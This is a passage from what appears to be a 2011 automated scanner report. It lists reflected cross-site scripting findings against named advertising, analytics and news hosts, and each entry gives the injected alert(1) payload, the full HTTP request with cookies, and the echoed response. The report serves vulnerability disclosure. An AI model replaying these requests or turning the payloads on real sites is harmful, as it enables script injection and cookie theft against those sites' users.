The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14a96'%3balert(1)//3dd8151559d was submitted in the admeld_callback parameter. This input was echoed as 14a96';alert(1)//3dd8151559d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match14a96'%3balert(1)//3dd8151559d HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=e1c22076-53f3-4fd9-8356-2735bf06a66c; segments_p1="eJzjYuHY2M7IxcIx9wojAA9oAtg="; exchange_uid="eyI0IjogWyJDQUVTRVB4NVdCa2dwbTVNQ3pVRHd2TlVDNXciLCA3MzQzODNdfQ=="; partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 04-Sep-2011 01:04:56 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 247

document.write('<img width="0" height="0" src="http://tag.admeld.com/match14a96';alert(1)//3dd8151559d?admeld_adprovider_id=300&external_user_id=e1c22076-53f3-4fd9-8356-2735bf06a66c&Expiration=1315530316&custom_user_segments=%2C17329%2C27165"/>
...[SNIP]...

5.56. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9782a"><script>alert(1)</script>8fada19613b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com9782a"><script>alert(1)</script>8fada19613b/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com9782a"><script>alert(1)</script>8fada19613b/ac/377283912/Bottom3/default/empty.gif/4d686437616b35697963454144412f72?x" target="_top">
...[SNIP]...

5.57. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a684b"><script>alert(1)</script>4e0d56cffe6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com/ac@Bottom3a684b"><script>alert(1)</script>4e0d56cffe6 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 329
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com/ac/86271498/Bottom3a684b"><script>alert(1)</script>4e0d56cffe6/default/empty.gif/4d686437616b35697963454144412f72?x" target="_top">
...[SNIP]...

5.58. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75258"><script>alert(1)</script>9210644d738 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=75258"><script>alert(1)</script>9210644d738&sp=y&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2420786125005478449; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:01 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2420786125005478449&rnd=4026326661709276972&fpid=75258"><script>alert(1)</script>9210644d738&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.59. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40167"><script>alert(1)</script>eaafdf22b34 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=40167"><script>alert(1)</script>eaafdf22b34&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2420786125005478449; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:01 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2420786125005478449&rnd=4295609569520200019&fpid=4&nu=n&t=&sp=40167"><script>alert(1)</script>eaafdf22b34&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.60. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtq.careerbuilder.com
Path:   /RTQ/jobstream.aspx

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f59'%3balert(1)//ef7e95529ce was submitted in the lr parameter. This input was echoed as 69f59';alert(1)//ef7e95529ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB69f59'%3balert(1)//ef7e95529ce&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL1
Date: Sun, 04 Sep 2011 00:58:11 GMT
Connection: close
Content-Length: 6632

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...
<input type="hidden" name="lr" value="CBMC_SB69f59';alert(1)//ef7e95529ce" />
...[SNIP]...

5.61. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [rssid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtq.careerbuilder.com
Path:   /RTQ/jobstream.aspx

Issue detail

The value of the rssid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75175'%3balert(1)//9366c27e6c8 was submitted in the rssid parameter. This input was echoed as 75175';alert(1)//9366c27e6c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm75175'%3balert(1)//9366c27e6c8&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL52
Date: Sun, 04 Sep 2011 00:58:14 GMT
Connection: close
Content-Length: 6632

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...
<input type="hidden" name="siteid=" value="MC_SB_jbstrm75175';alert(1)//9366c27e6c8" />
...[SNIP]...

5.62. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 41775<script>alert(1)</script>674217f51e3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb041775<script>alert(1)</script>674217f51e3 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 43049
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:45:19 GMT
Connection: close

plcb041775<script>alert(1)</script>674217f51e3('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...

5.63. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 22e8e><img%20src%3da%20onerror%3dalert(1)>4976d325d44 was submitted in the plckcommentonkey parameter. This input was echoed as 22e8e><img src=a onerror=alert(1)>4976d325d44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog22e8e><img%20src%3da%20onerror%3dalert(1)>4976d325d44&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 34640
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:45:09 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_66556\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"545853.blog22e8e><img src=a onerror=alert(1)>4976d325d44\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.64. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6aaf0><img%20src%3da%20onerror%3dalert(1)>2b3406c2615 was submitted in the plckcommentonkeytype parameter. This input was echoed as 6aaf0><img src=a onerror=alert(1)>2b3406c2615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article6aaf0><img%20src%3da%20onerror%3dalert(1)>2b3406c2615&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449799883; path=/
Cache-Control: private
Content-Length: 34978
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:44:59 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
_comments_83406\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"545853.blog\" commentOnKeyType=\"article6aaf0><img src=a onerror=alert(1)>2b3406c2615\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

5.65. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 478ec<script>alert(1)</script>70f21925513 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback478ec<script>alert(1)</script>70f21925513 HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:23 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback478ec<script>alert(1)</script>70f21925513({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

5.66. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sprint.tt.omtrdc.net
Path:   /m2/sprint/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 574f5<script>alert(1)</script>7248981ddd2 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox574f5<script>alert(1)</script>7248981ddd2&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:46:21 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 220
Date: Sun, 04 Sep 2011 00:46:21 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox574f5<script>alert(1)</script>7248981ddd2',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");

5.67. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 28a5e<script>alert(1)</script>85decac219a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reuters/trc/2/json?tim=19%3A44%3A27.751&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=353&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&llvl=2&item-id=USTRE78222D20110903&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&page-id=6c870e4113048a2a02755a640f72c25ab23ac976&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_128a5e<script>alert(1)</script>85decac219a HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:52:30 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097550;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f6;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 00:52:30 GMT
Content-Length: 3988

